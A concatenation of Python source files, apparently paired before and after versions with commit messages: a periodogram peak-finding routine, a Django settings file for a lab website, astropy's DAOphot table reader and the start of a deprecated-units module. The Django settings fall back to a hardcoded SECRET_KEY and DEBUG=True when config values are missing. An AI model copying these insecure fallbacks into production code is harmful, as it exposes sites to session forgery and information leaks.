        # period and from all the other existing best periods by
        # periodepsilon to make sure we jump to an entire different
        # peak in the periodogram
        if (perioddiff > (periodepsilon*prevperiod) and
            all(x > (periodepsilon*period)
                for x in bestperiodsdiff)):
            nbestperiods.append(period)
            nbestlspvals.append(lspval)
            nbestinds.append(ind)
            peakcount = peakcount + 1

        prevperiod = period

    # generate the return dict
    resultdict = {
        'tlsresult':tlsresult,
        'bestperiod':finperiods[bestperiodind],
        'bestlspval':finlsp[bestperiodind],
        'nbestpeaks':nbestpeaks,
        'nbestinds':nbestinds,
        'nbestlspvals':nbestlspvals,
        'nbestperiods':nbestperiods,
        'lspvals':lsp,
        'periods':periods,
        'method':'tls',
        'kwargs':{'startp':startp,
                  'endp':endp,
                  'tlsoversample':tlsoversample,
                  'tlsntransits':tlsmintransits,
                  'periodepsilon':periodepsilon,
                  'nbestpeaks':nbestpeaks,
                  'sigclip':sigclip,
                  'magsarefluxes':magsarefluxes}
    }

    return resultdict
|
"""
Django settings for makeabilitylab project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
from configparser import ConfigParser
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Load a ConfigParser object from a file called config.ini at the base level
# of the django project.
config = ConfigParser()
config.read(os.path.join(BASE_DIR, 'config.ini'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
if config.has_option('Django', 'SECRET_KEY'):
SECRET_KEY = config.get('Django', 'SECRET_KEY')
else:
# We should never be in production with this key
SECRET_KEY = 'pe)-#st8rk!pomy!_1ha7=cpypp_(8%1xqmtw%!u@kw-f5&w^e'
# SECURITY WARNING: don't run with debug turned on in production!
# we will default to True if not overriden in the config file
if config.has_option('Django', 'DEBUG'):
DEBUG = config.getboolean('Django', 'DEBUG')
else:
DEBUG = True
# TODO: Take this out when done debugging production
# DEBUG = True
if config.has_option('Django', 'ALLOWED_HOSTS'):
USE_X_FORWARDED_HOST = True
ALLOWED_HOSTS = config.get('Django', 'ALLOWED_HOSTS').split(',')
else:
ALLOWED_HOSTS = []
# Added to try and log problems to file to debug talk upload issue: https://github.com/jonfroehlich/makeabilitylabwebsite/issues/184
# For Log settings examples, see:
# 1. https://docs.djangoproject.com/en/1.11/topics/logging/#examples
# 2. https://gist.github.com/palewire/1740398#file-settings-py
# TODO: I had to comment this out because I couldn't get it to work on the production server
# perhaps due to file write permissions on the log. I need to investigate further.
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'makeabilitylab_django.log'),
# },
# },
# 'loggers': {
# 'django': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# 'propagate': True,
# },
# },
# }
##DEBUG LOGGING FOR CSE SUPPORT SETUP
# TODO: commenting this out as it's only useful for debugging with Docker on test and production but breaks localhost dev (without docker)
# We can re-add this to debug in future and/or come up with a solution that doesn't break localhost dev.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': '/code/media/debug.log',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True,
},
},
}
# Application definition
INSTALLED_APPS = [
'website.apps.WebsiteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# To use IPython-enabled Django shell through Django extensions
# pip3 install django_extensions
# python manage.py shell_plus
# https://opensourcehacker.com/2014/08/13/turbocharge-your-python-prompt-and-django-shell-with-ipython-notebook/
'django_extensions',
'image_cropping',
'easy_thumbnails',
'sortedm2m'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'makeabilitylab.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'website.context_processors.recent_news'
],
},
},
]
WSGI_APPLICATION = 'makeabilitylab.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
if ALLOWED_HOSTS:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config.get('Postgres', 'DATABASE'),
'USER': config.get('Postgres', 'USER'),
'PASSWORD': config.get('Postgres', 'PASSWORD'),
'HOST': config.get('Postgres', 'HOSTNAME'),
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'US/Eastern'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# JEF: I added these for uploading files.
# See:
# http://stackoverflow.com/questions/22570723/handling-uploading-image-django-admin-python
# https://github.com/axelpale/minimal-django-file-upload-example
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Thumbnail processing
# LS: from https://github.com/jonasundderwolf/django-image-cropping
from easy_thumbnails.conf import Settings as thumbnail_settings
THUMBNAIL_PROCESSORS = (
'image_cropping.thumbnail_processors.crop_corners',
) + thumbnail_settings.THUMBNAIL_PROCESSORS
added verbose logging formatter to CSE loggers in settings.py
"""
Django settings for makeabilitylab project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
from configparser import ConfigParser
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Load a ConfigParser object from a file called config.ini at the base level
# of the django project.
config = ConfigParser()
config.read(os.path.join(BASE_DIR, 'config.ini'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
if config.has_option('Django', 'SECRET_KEY'):
SECRET_KEY = config.get('Django', 'SECRET_KEY')
else:
# We should never be in production with this key
SECRET_KEY = 'pe)-#st8rk!pomy!_1ha7=cpypp_(8%1xqmtw%!u@kw-f5&w^e'
# SECURITY WARNING: don't run with debug turned on in production!
# we will default to True if not overriden in the config file
if config.has_option('Django', 'DEBUG'):
DEBUG = config.getboolean('Django', 'DEBUG')
else:
DEBUG = True
# TODO: Take this out when done debugging production
# DEBUG = True
if config.has_option('Django', 'ALLOWED_HOSTS'):
USE_X_FORWARDED_HOST = True
ALLOWED_HOSTS = config.get('Django', 'ALLOWED_HOSTS').split(',')
else:
ALLOWED_HOSTS = []
# Added to try and log problems to file to debug talk upload issue: https://github.com/jonfroehlich/makeabilitylabwebsite/issues/184
# For Log settings examples, see:
# 1. https://docs.djangoproject.com/en/1.11/topics/logging/#examples
# 2. https://gist.github.com/palewire/1740398#file-settings-py
# TODO: I had to comment this out because I couldn't get it to work on the production server
# perhaps due to file write permissions on the log. I need to investigate further.
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'makeabilitylab_django.log'),
# },
# },
# 'loggers': {
# 'django': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# 'propagate': True,
# },
# },
# }
##DEBUG LOGGING FOR CSE SUPPORT SETUP
# TODO: investigate commenting this out as it's only useful for debugging with Docker on test and production but breaks localhost dev (without docker)
# We can re-add this to debug in future and/or come up with a solution that doesn't break localhost dev.
# See: https://docs.djangoproject.com/en/2.0/topics/logging/
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': '/code/media/debug.log',
'formatter': 'verbose', # can switch between verbose and simple
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True,
},
},
}
# Application definition
INSTALLED_APPS = [
'website.apps.WebsiteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# To use IPython-enabled Django shell through Django extensions
# pip3 install django_extensions
# python manage.py shell_plus
# https://opensourcehacker.com/2014/08/13/turbocharge-your-python-prompt-and-django-shell-with-ipython-notebook/
'django_extensions',
'image_cropping',
'easy_thumbnails',
'sortedm2m'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'makeabilitylab.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'website.context_processors.recent_news'
],
},
},
]
WSGI_APPLICATION = 'makeabilitylab.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
if ALLOWED_HOSTS:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config.get('Postgres', 'DATABASE'),
'USER': config.get('Postgres', 'USER'),
'PASSWORD': config.get('Postgres', 'PASSWORD'),
'HOST': config.get('Postgres', 'HOSTNAME'),
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'US/Eastern'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# JEF: I added these for uploading files.
# See:
# http://stackoverflow.com/questions/22570723/handling-uploading-image-django-admin-python
# https://github.com/axelpale/minimal-django-file-upload-example
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Thumbnail processing
# LS: from https://github.com/jonasundderwolf/django-image-cropping
from easy_thumbnails.conf import Settings as thumbnail_settings
THUMBNAIL_PROCESSORS = (
'image_cropping.thumbnail_processors.crop_corners',
) + thumbnail_settings.THUMBNAIL_PROCESSORS
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""An extensible ASCII table reader and writer.
daophot.py:
Classes to read DAOphot table format
:Copyright: Smithsonian Astrophysical Observatory (2011)
:Author: Tom Aldcroft (aldcroft@head.cfa.harvard.edu)
"""
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## * Neither the name of the Smithsonian Astrophysical Observatory nor the
## names of its contributors may be used to endorse or promote products
## derived from this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
## ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
## WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
## DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
## DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
## (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
## LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
## ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import numpy as np
from . import core
from . import basic
from . import fixedwidth
from ...utils import OrderedDict
class Daophot(core.BaseReader):
    """Read a DAOphot file.
    Example::
      #K MERGERAD = INDEF scaleunit %-23.7g
      #K IRAF = NOAO/IRAFV2.10EXPORT version %-23s
      #K USER = davis name %-23s
      #K HOST = tucana computer %-23s
      #
      #N ID XCENTER YCENTER MAG MERR MSKY NITER \\
      #U ## pixels pixels magnitudes magnitudes counts ## \\
      #F %-9d %-10.3f %-10.3f %-12.3f %-14.3f %-15.7g %-6d
      #
      #N SHARPNESS CHI PIER PERROR \\
      #U ## ## ## perrors \\
      #F %-23.3f %-12.3f %-6d %-13s
      #
      14 138.538 INDEF 15.461 0.003 34.85955 4 \\
      -0.032 0.802 0 No_error
    The keywords defined in the #K records are available via the output table
    ``meta`` attribute::
      >>> import os
      >>> from astropy.io import ascii
      >>> filename = os.path.join(ascii.__path__[0], 'tests/t/daophot.dat')
      >>> data = ascii.read(filename)
      >>> for name, keyword in data.meta['keywords'].items():
      ...     print name, keyword['value'], keyword['units'], keyword['format']
      ...
      MERGERAD INDEF scaleunit %-23.7g
      IRAF NOAO/IRAFV2.10EXPORT version %-23s
      USER name %-23s
      ...
    The units and formats are available in the output table columns::
      >>> for colname in data.colnames:
      ...     col = data[colname]
      ...     print colname, col.units, col.format
      ...
      ID None %-9d
      XCENTER pixels %-10.3f
      YCENTER pixels %-10.3f
      ...
    Any column values of INDEF are interpreted as a missing value and will be
    masked out in the resultant table.
    """
    def __init__(self):
        core.BaseReader.__init__(self)
        # Custom header parser that understands the #K/#N/#U/#F records.
        self.header = DaophotHeader()
        # Lines ending in a continuation character are joined, except
        # comment lines (those matching no_continue).
        self.inputter = core.ContinuationLinesInputter()
        self.inputter.no_continue = r'\s*#'
        # Data rows are fixed-width; column start/end positions are set by
        # DaophotHeader.get_cols from the #F format widths.
        self.data.splitter = fixedwidth.FixedWidthSplitter()
        self.data.start_line = 0
        self.data.comment = r'\s*#'
    def write(self, table=None):
        # Writing the DAOphot format is not supported; this reader is
        # read-only.
        raise NotImplementedError
class DaophotHeader(core.BaseHeader):
    """Read the header from a file produced by the IRAF DAOphot routine."""
    def __init__(self):
        core.BaseHeader.__init__(self)
        # Only #K keyword records count as header comments here.
        self.comment = r'\s*#K'
    def update_meta(self, lines, meta):
        """
        Extract table-level keywords for DAOphot table. These are indicated by
        a leading '#K ' prefix.
        """
        table_meta = meta['table']
        # Read keywords as a table embedded in the header comments
        comment_lines = [line for line in lines if line.startswith('#')]
        if len(comment_lines) > 0:
            re_header_keyword = re.compile(r'[#]K'
                                           r'\s+ (?P<name> \w+)'
                                           r'\s* = (?P<stuff> .+) $',
                                           re.VERBOSE)
            table_meta['keywords'] = OrderedDict()
            for line in comment_lines:
                m = re_header_keyword.match(line)
                if m:
                    # 'stuff' is "<value> <units> <format>"; rsplit(None, 2)
                    # peels units and format off the right so the value may
                    # itself contain whitespace (or be absent entirely).
                    vals = m.group('stuff').strip().rsplit(None, 2)
                    keyword_dict = {'units': vals[-2],
                                    'format': vals[-1]}
                    keyword_dict['value'] = (vals[0] if len(vals) > 2 else "")
                    table_meta['keywords'][m.group('name')] = keyword_dict
    def get_cols(self, lines):
        """Initialize the header Column objects from the table ``lines`` for a DAOphot
        header. The DAOphot header is specialized so that we just copy the entire BaseHeader
        get_cols routine and modify as needed.
        :param lines: list of table lines
        :returns: list of table Columns
        """
        # Parse a series of column defintion lines like below. There may be several
        # such blocks in a single file (where continuation characters have already been
        # stripped).
        # #N ID    XCENTER   YCENTER   MAG         MERR          MSKY           NITER
        # #U ##    pixels    pixels    magnitudes  magnitudes    counts         ##
        # #F %-9d  %-10.3f   %-10.3f   %-12.3f     %-14.3f       %-15.7g        %-6d
        # Accumulators for the concatenated #N, #U and #F lines respectively.
        coldef_lines = ['', '', '']
        starts = ('#N ', '#U ', '#F ')
        col_width = []
        col_len_def = re.compile(r'[0-9]+')
        re_colformat_def = re.compile(r'#F([^#]+)')
        for line in lines:
            if not line.startswith('#'):
                break # End of header lines
            else:
                formatmatch = re_colformat_def.search(line)
                if formatmatch:
                    # Field width of each column = leading integer of its
                    # %-<width>.<prec><type> format specifier.
                    form = formatmatch.group(1).split()
                    width = ([int(col_len_def.search(s).group()) for s in form])
                    # original data format might be shorter than 80 characters
                    # and filled with spaces
                    # NOTE(review): assumes 80-character data records -- if a
                    # DAOphot file used a different record length this would
                    # mis-place the last column; confirm against the spec.
                    width[-1] = 80 - sum(width[:-1])
                    col_width.extend(width)
                for i, start in enumerate(starts):
                    if line.startswith(start):
                        # line[2:] drops only '#N'/'#U'/'#F', keeping the
                        # following space as a separator between blocks.
                        line_stripped = line[2:]
                        coldef_lines[i] = coldef_lines[i] + line_stripped
                        break
        # At this point colddef_lines has three lines corresponding to column
        # names, units, and format. Get the column names by splitting the
        # first line on whitespace.
        self.names = coldef_lines[0].split()
        if not self.names:
            raise core.InconsistentTableError('No column names found in DAOphot header')
        ends = np.cumsum(col_width)
        starts = ends - col_width
        # If there wasn't a #U defined (not sure of DAOphot specification), then
        # replace the empty line with the right number of ## indicators, which matches
        # the DAOphot "no unit" tag.
        for i, coldef_line in enumerate(coldef_lines):
            if not coldef_line:
                coldef_lines[i] = '## ' * len(self.names)
        # Read the three lines as a basic table.
        reader = core._get_reader(Reader=basic.Basic, comment=None)
        reader.header.comment = None
        coldefs = reader.read(coldef_lines)
        # Create the list of io.ascii column objects
        self._set_cols_from_names()
        # Set units and format as needed.
        for col in self.cols:
            if coldefs[col.name][0] != '##':
                col.units = coldefs[col.name][0]
            if coldefs[col.name][1] != '##':
                col.format = coldefs[col.name][1]
        # Set column start and end positions. Also re-index the cols because
        # the FixedWidthSplitter does NOT return the ignored cols (as is the
        # case for typical delimiter-based splitters).
        for i, col in enumerate(self.cols):
            col.start = starts[col.index]
            col.end = ends[col.index]
            col.index = i
            # Infer the column type from the %-format conversion character.
            if hasattr(col, 'format'):
                if any(x in col.format for x in 'fg'):
                    col.type = core.FloatType
                elif 'd' in col.format:
                    col.type = core.IntType
                elif 's' in col.format:
                    col.type = core.StrType
        self.n_data_cols = len(self.cols)
        # INDEF is the missing value marker
        self.data.fill_values.append(('INDEF', '0'))
Replace docstring < etc > with ... so doctest will work
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""An extensible ASCII table reader and writer.
daophot.py:
Classes to read DAOphot table format
:Copyright: Smithsonian Astrophysical Observatory (2011)
:Author: Tom Aldcroft (aldcroft@head.cfa.harvard.edu)
"""
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## * Neither the name of the Smithsonian Astrophysical Observatory nor the
## names of its contributors may be used to endorse or promote products
## derived from this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
## ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
## WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
## DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
## DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
## (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
## LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
## ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import numpy as np
from . import core
from . import basic
from . import fixedwidth
from ...utils import OrderedDict
class Daophot(core.BaseReader):
    """Read a DAOphot file.
    Example::
      #K MERGERAD = INDEF scaleunit %-23.7g
      #K IRAF = NOAO/IRAFV2.10EXPORT version %-23s
      #K USER = davis name %-23s
      #K HOST = tucana computer %-23s
      #
      #N ID XCENTER YCENTER MAG MERR MSKY NITER \\
      #U ## pixels pixels magnitudes magnitudes counts ## \\
      #F %-9d %-10.3f %-10.3f %-12.3f %-14.3f %-15.7g %-6d
      #
      #N SHARPNESS CHI PIER PERROR \\
      #U ## ## ## perrors \\
      #F %-23.3f %-12.3f %-6d %-13s
      #
      14 138.538 INDEF 15.461 0.003 34.85955 4 \\
      -0.032 0.802 0 No_error
    The keywords defined in the #K records are available via the output table
    ``meta`` attribute::
      >>> import os
      >>> from astropy.io import ascii
      >>> filename = os.path.join(ascii.__path__[0], 'tests/t/daophot.dat')
      >>> data = ascii.read(filename)
      >>> for name, keyword in data.meta['keywords'].items():
      ...     print name, keyword['value'], keyword['units'], keyword['format']
      ...
      MERGERAD INDEF scaleunit %-23.7g
      IRAF NOAO/IRAFV2.10EXPORT version %-23s
      USER name %-23s
      ...
    The units and formats are available in the output table columns::
      >>> for colname in data.colnames:
      ...     col = data[colname]
      ...     print colname, col.units, col.format
      ...
      ID None %-9d
      XCENTER pixels %-10.3f
      YCENTER pixels %-10.3f
      ...
    Any column values of INDEF are interpreted as a missing value and will be
    masked out in the resultant table.
    """
    def __init__(self):
        core.BaseReader.__init__(self)
        # Custom header parser that understands the #K/#N/#U/#F records.
        self.header = DaophotHeader()
        # Lines ending in a continuation character are joined, except
        # comment lines (those matching no_continue).
        self.inputter = core.ContinuationLinesInputter()
        self.inputter.no_continue = r'\s*#'
        # Data rows are fixed-width; column start/end positions are set by
        # DaophotHeader.get_cols from the #F format widths.
        self.data.splitter = fixedwidth.FixedWidthSplitter()
        self.data.start_line = 0
        self.data.comment = r'\s*#'
    def write(self, table=None):
        # Writing the DAOphot format is not supported; this reader is
        # read-only.
        raise NotImplementedError
class DaophotHeader(core.BaseHeader):
    """Read the header from a file produced by the IRAF DAOphot routine."""
    def __init__(self):
        core.BaseHeader.__init__(self)
        # Only #K keyword records count as header comments here.
        self.comment = r'\s*#K'
    def update_meta(self, lines, meta):
        """
        Extract table-level keywords for DAOphot table. These are indicated by
        a leading '#K ' prefix.
        """
        table_meta = meta['table']
        # Read keywords as a table embedded in the header comments
        comment_lines = [line for line in lines if line.startswith('#')]
        if len(comment_lines) > 0:
            re_header_keyword = re.compile(r'[#]K'
                                           r'\s+ (?P<name> \w+)'
                                           r'\s* = (?P<stuff> .+) $',
                                           re.VERBOSE)
            table_meta['keywords'] = OrderedDict()
            for line in comment_lines:
                m = re_header_keyword.match(line)
                if m:
                    # 'stuff' is "<value> <units> <format>"; rsplit(None, 2)
                    # peels units and format off the right so the value may
                    # itself contain whitespace (or be absent entirely).
                    vals = m.group('stuff').strip().rsplit(None, 2)
                    keyword_dict = {'units': vals[-2],
                                    'format': vals[-1]}
                    keyword_dict['value'] = (vals[0] if len(vals) > 2 else "")
                    table_meta['keywords'][m.group('name')] = keyword_dict
    def get_cols(self, lines):
        """Initialize the header Column objects from the table ``lines`` for a DAOphot
        header. The DAOphot header is specialized so that we just copy the entire BaseHeader
        get_cols routine and modify as needed.
        :param lines: list of table lines
        :returns: list of table Columns
        """
        # Parse a series of column defintion lines like below. There may be several
        # such blocks in a single file (where continuation characters have already been
        # stripped).
        # #N ID    XCENTER   YCENTER   MAG         MERR          MSKY           NITER
        # #U ##    pixels    pixels    magnitudes  magnitudes    counts         ##
        # #F %-9d  %-10.3f   %-10.3f   %-12.3f     %-14.3f       %-15.7g        %-6d
        # Accumulators for the concatenated #N, #U and #F lines respectively.
        coldef_lines = ['', '', '']
        starts = ('#N ', '#U ', '#F ')
        col_width = []
        col_len_def = re.compile(r'[0-9]+')
        re_colformat_def = re.compile(r'#F([^#]+)')
        for line in lines:
            if not line.startswith('#'):
                break # End of header lines
            else:
                formatmatch = re_colformat_def.search(line)
                if formatmatch:
                    # Field width of each column = leading integer of its
                    # %-<width>.<prec><type> format specifier.
                    form = formatmatch.group(1).split()
                    width = ([int(col_len_def.search(s).group()) for s in form])
                    # original data format might be shorter than 80 characters
                    # and filled with spaces
                    # NOTE(review): assumes 80-character data records -- if a
                    # DAOphot file used a different record length this would
                    # mis-place the last column; confirm against the spec.
                    width[-1] = 80 - sum(width[:-1])
                    col_width.extend(width)
                for i, start in enumerate(starts):
                    if line.startswith(start):
                        # line[2:] drops only '#N'/'#U'/'#F', keeping the
                        # following space as a separator between blocks.
                        line_stripped = line[2:]
                        coldef_lines[i] = coldef_lines[i] + line_stripped
                        break
        # At this point colddef_lines has three lines corresponding to column
        # names, units, and format. Get the column names by splitting the
        # first line on whitespace.
        self.names = coldef_lines[0].split()
        if not self.names:
            raise core.InconsistentTableError('No column names found in DAOphot header')
        ends = np.cumsum(col_width)
        starts = ends - col_width
        # If there wasn't a #U defined (not sure of DAOphot specification), then
        # replace the empty line with the right number of ## indicators, which matches
        # the DAOphot "no unit" tag.
        for i, coldef_line in enumerate(coldef_lines):
            if not coldef_line:
                coldef_lines[i] = '## ' * len(self.names)
        # Read the three lines as a basic table.
        reader = core._get_reader(Reader=basic.Basic, comment=None)
        reader.header.comment = None
        coldefs = reader.read(coldef_lines)
        # Create the list of io.ascii column objects
        self._set_cols_from_names()
        # Set units and format as needed.
        for col in self.cols:
            if coldefs[col.name][0] != '##':
                col.units = coldefs[col.name][0]
            if coldefs[col.name][1] != '##':
                col.format = coldefs[col.name][1]
        # Set column start and end positions. Also re-index the cols because
        # the FixedWidthSplitter does NOT return the ignored cols (as is the
        # case for typical delimiter-based splitters).
        for i, col in enumerate(self.cols):
            col.start = starts[col.index]
            col.end = ends[col.index]
            col.index = i
            # Infer the column type from the %-format conversion character.
            if hasattr(col, 'format'):
                if any(x in col.format for x in 'fg'):
                    col.type = core.FloatType
                elif 'd' in col.format:
                    col.type = core.IntType
                elif 's' in col.format:
                    col.type = core.StrType
        self.n_data_cols = len(self.cols)
        # INDEF is the missing value marker
        self.data.fill_values.append(('INDEF', '0'))
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This package defines deprecated units.
These units are not available in the top-level `astropy.units`
namespace. To use these units, you must import the `astropy.units.deprecated`
module::
>>> from astropy.units import deprecated
>>> q = 10. * deprecated.emu # doctest: +SKIP
To include them in `~astropy.units.UnitBase.compose` and the results of
`~astropy.units.UnitBase.find_equivalent_units`, do::
>>> from astropy.units import deprecated
>>> deprecated.enable() # doctest: +SKIP
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
# Module namespace into which def_unit/_add_prefixes inject the unit objects.
_ns = globals()
def _initialize_module():
    """Populate this module's namespace with the deprecated units."""
    # Imports are function-local so the module namespace exposes only units.
    from . import astrophys
    from . import cgs
    from .core import _add_prefixes, def_unit
    def_unit(['emu'], cgs.Bi, namespace=_ns,
